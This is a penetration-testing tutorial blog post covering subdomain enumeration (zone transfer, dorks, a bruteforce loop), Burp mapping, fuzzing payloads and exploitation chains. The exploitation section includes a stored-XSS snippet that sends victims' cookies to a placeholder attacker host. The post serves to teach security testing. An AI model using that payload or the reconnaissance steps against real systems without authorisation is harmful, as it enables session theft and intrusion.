This is one part of a two-part series – take a look at Hacking a Corporation From the Inside: Internal Penetration Tests too!
Occasionally I get asked by clients how I approach the technical aspects of a penetration test – you know, what are all those little black boxes with green text that I’ve got open on my screen? Just as often, when I’m talking to new testers and people interested in becoming a penetration tester, I find they understand tool use, and they often understand the specifics of vulnerabilities, but they don’t necessarily know how it all goes together.
Additionally, GracefulSecurity.com is filled with information on web application security, but there’s no guide to how it all fits together! So here I plan to write up a step-by-step example of how I go from a web address to real business impact.
Every application is different, but my intention as ‘an attacker’ is generally the same, so this won’t be a complete guide to compromising systems. Hopefully, though, it will fill in some of the blanks if you’ve ever had a tester poke around at your kit, are considering getting a tester to assess your security, or have just cracked the spine on your first web hacking book and want to know a little more about the full process.
When it comes to the attack – the actual act of plugging in and attacking a network – a methodology is followed; ask your penetration tester and they’ll be able to supply you with a written copy of theirs. But remember, every network is different and every attack is different. A standard way for a tester to operate is to find the path of least resistance, use it to gain as high a privilege level as possible, then utilise this privilege level to find additional methods of entry.
A penetration test is not like vulnerability analysis. Generally with vulnerability analysis you supply the assessor with a high level of information and privileges from the outset, and they perform authenticated scans of the network in order to determine all issues, or as many as possible. Vulnerability assessments generally grade issues independently and do not take into account the real-world exploitability of an issue, or how issues can be chained together to increase their overall impact. It could be argued that a vulnerability assessment gives a wide, but not deep, impression of the security of the network, and will highlight issues with processes such as patch management.
Penetration tests, on the other hand, aim to go as deep as possible and may sacrifice breadth to enable this, but they give a better idea of what a human attacker could pull off. These assessments will very likely involve actual exploitation of issues, the intentional compromise of systems and the chaining of vulnerabilities, and will highlight the worst-case scenario for a determined attacker aiming to gain a high level of access.
The tester will move through stages such as:
- Enumeration and Mapping
- Vulnerability Discovery
- Lateral Movement
- Privilege Escalation
- Clean-up/Removal of Evidence
The tester may be lucky and move through these stages directly, potentially even utilising shortcuts to skip some stages on the way to a complete compromise; or they may be unlucky and have to effectively step back to try and bypass a protection mechanism.
Enumeration and Mapping
Generally at the start of a penetration testing engagement you’ll be given a scope which includes IP addresses and application URLs. Some of those URLs may be along the lines of *.example.org – the client here is stating that all sub-domains of that domain should be assessed. The problem is that a well-configured system shouldn’t just hand out a list of all available sub-domains, so you may have to bruteforce them.
If the system is poorly configured, you could grab a list of domains from the authoritative name server. You can find the authoritative server with the following commands:
> nslookup
> set querytype=soa
> example.org
Then, using that authoritative name server, run the following command:
dig axfr @dns-server example.org
Where dns-server is the authoritative server from the nslookup command. This will cause a DNS Zone Transfer and effectively output a list of available sub-domains.
An alternative way to get this information is through Google hacking, using Google “dorks”. These are specific keywords given to the search engine to restrict the search; for example, you could use a search like this:
site:example.org
This will cause Google to restrict its search to the target domain, where it may return results such as ftp.example.org, www.example.org and more. To save us searching through multiple pages of search results, we can take a note of the discovered subdomains and then use negative searching to take them out of the results, like this:
site:example.org -site:ftp.example.org -site:www.example.org
Just repeat until you’ve found all the domains the search engine knows about!
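The repeat-and-exclude loop can be sketched as a tiny helper that builds the next search query from the subdomains found so far (a minimal sketch – running the searches themselves stays manual, and the function name is my own):

```python
def build_dork(domain, found_subdomains):
    """Build a Google dork that restricts results to `domain` but
    excludes subdomains we've already discovered."""
    terms = [f"site:{domain}"]
    # Each discovered subdomain becomes a negative site: filter.
    terms += [f"-site:{sub}" for sub in found_subdomains]
    return " ".join(terms)

# After spotting ftp. and www. in the first page of results:
query = build_dork("example.org", ["ftp.example.org", "www.example.org"])
print(query)  # site:example.org -site:ftp.example.org -site:www.example.org
```

Each round of searching feeds its discoveries back into the next query until no new subdomains appear.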
The final way to bruteforce subdomains is with a list of common subdomain names. No need for fancy tools here: just create a list of potential subdomains called subdomains.txt and run a bash one-liner like this:
cat subdomains.txt | while read -r sub; do nslookup "$sub.example.org"; done | grep "Name:"
If you get any hits, nslookup will print a Name: line for each subdomain that resolves.
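The same bruteforce fits in a few lines of Python. This is a sketch of the idea rather than a polished tool: socket.gethostbyname stands in for nslookup, and the resolver is a parameter so you can swap in your preferred DNS library.

```python
import socket

def bruteforce_subdomains(domain, wordlist, resolve=socket.gethostbyname):
    """Try each candidate subdomain and return the ones that resolve.

    `resolve` should raise an exception (as socket.gethostbyname does)
    for names that don't exist.
    """
    found = []
    for word in wordlist:
        candidate = f"{word}.{domain}"
        try:
            resolve(candidate)  # raises socket.gaierror for unknown hosts
        except OSError:
            continue
        found.append(candidate)
    return found
```

Feeding it the contents of subdomains.txt mirrors the nslookup loop above, e.g. `bruteforce_subdomains("example.org", open("subdomains.txt").read().split())`.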
Now that you’re armed with a list of in-scope applications, it’s time to start mapping the applications themselves. For almost all the steps of a web application assessment I use Burp Suite – there’s a free version, or alternatively you could use OWASP ZAP. If you’re new to Burp, I’ve done a full write-up of the Professional version showing Burp Suite usage here.
To map the application Burp has two options, “Spider” and “Discover Content”. Spider is a pretty simple tool which you can select from the Target > Site Map view.
Spider simply navigates around a domain and follows all of the links, effectively mapping all linked content. However, it obviously won’t find any unlinked content, such as hidden administrative interfaces, log files and backup content. The “Discover Content” option – a forced-browsing tool – can be used for that!
This option uses a built-in list of possible files and directories and attempts to access each of them, then reports whether that was possible or not! You can start it with the session button in the Discover Content window.
Once that’s finished (which will likely take a long time!) you should have a map of all the content on the application, meaning you’ll have a list of all of the functions the application offers; now it’s just a case of testing each function for vulnerabilities! A list of unique requests can be found in the Burp Dashboard.
If we’ve mapped the whole application this “Contents” list will show all functions, so we test each in turn.
Vulnerability Discovery
When it comes to vulnerability discovery we’re going to assess each function in turn, likely using either the Intruder or Repeater function of Burp Suite (these are described here). There are two main ways to assess each function. The first is simply fuzzing: trying to break the logic of the function to see if anything interesting happens, where “interesting” could be a verbose error message, information disclosure or a function bypass. Alternatively you can approach the function from the point of view of a specific vulnerability and try payloads crafted for that issue, such as HTTP Header Injection, SQL Injection, Command Injection, Cross-site Scripting, Cross-site Request Forgery, XML eXternal Entity Injection, or Insecure Direct Object Reference.
From a generic fuzzing point of view it’s a good idea to place payloads such as the following into every input to see how the application reacts:
1
10
100
1000000000000000000000000
-1
0.1
lizard
'
"
;
)
))))))))))))))))))))
]
]]]]]]]]]]]]]]]]]]]]
TRUE
FALSE
\0
%00
|
Potentially the application will respond with output that, in context, may point to a vulnerability, such as a verbose error message. Alternatively you can send payloads specifically designed to exploit issues such as those listed in the OWASP Top 10. For a decent list of potential payloads I’ve compiled some cheat sheets here, or alternatively a huge payload list is available as part of fuzzdb!
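If you’d rather drive the fuzzing from a script than from Intruder, generating the test matrix is just a nested loop over parameters and payloads. A minimal sketch (sending the requests and diffing the responses is left to your HTTP client of choice, and the parameter names are illustrative):

```python
# A short selection of the generic payloads above; extend as needed.
PAYLOADS = [
    "1", "10", "100", "1000000000000000000000000", "-1", "0.1",
    "lizard", "'", '"', ";", ")", "]", "TRUE", "FALSE", "%00", "|",
]

def fuzz_cases(params):
    """Yield (parameter, payload) pairs, fuzzing one parameter at a time."""
    for param in params:
        for payload in PAYLOADS:
            yield param, payload

# e.g. for a login form with two inputs:
cases = list(fuzz_cases(["username", "page"]))
```

Each pair then becomes one request, with the payload substituted into that parameter while the others are left at their baseline values.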
Exploitation, Lateral Movement and Privilege Escalation
There are a few ways that exploitation can lead to lateral movement or privilege escalation. The first is if a vulnerability exists which allows command execution – such as SQL Injection or Command Injection. In this case the assessor will likely be able to target additional systems within the DMZ or the internal corporate network. In fact, at the point of being able to run commands the assessment ceases to be a web application assessment and leans more towards an internal network assessment.
Additionally there’s the potential that a vulnerability such as XML eXternal Entity Injection, Path Traversal or Arbitrary File Download can lead to credentials being stolen by an attacker, with lateral movement to other systems then following through credential reuse.
Finally, if an attacker is able to achieve stored Cross-site Scripting, there may be the potential that the payload executes on an entirely different application. For example, if a user creates an account through standard user registration on www.example.org, a stored cross-site scripting payload in a parameter such as home address could find its way into admin.example.org, allowing the attacker to attack that application too – potentially by stealing session tokens or through on-site request forgery.
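To make the session-token theft concrete, here’s a sketch of the kind of payload an attacker might store in that home-address field. Everything here is illustrative: attacker.example and the /c collector path are placeholders, not real infrastructure, and in practice HttpOnly cookies would blunt this particular trick.

```python
def cookie_theft_payload(collector_host):
    """Build a stored-XSS payload that sends the victim's cookies to an
    attacker-controlled host when the page rendering it is viewed."""
    return ("<script>new Image().src='https://" + collector_host
            + "/c?'+encodeURIComponent(document.cookie);</script>")

payload = cookie_theft_payload("attacker.example")
```

When an administrator later views the record in admin.example.org, the injected script fires in their session and the request to the collector carries their cookies.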
Clean-up/Removal of Evidence
Now if this were a malicious attacker performing these steps there would be much more work to be done: log carving and generally removing all traces of activity, as you’d expect. As a penetration tester, however, there’s still work to be done too. Depending on the path of exploitation there may be files and user accounts that should be cleaned up. For example, if it was possible to upload a web shell due to insecure file handling, then that shell should be removed at the end of the engagement so the system is returned as close as possible to its state before the engagement began.
Now it’s time to write that assessment report…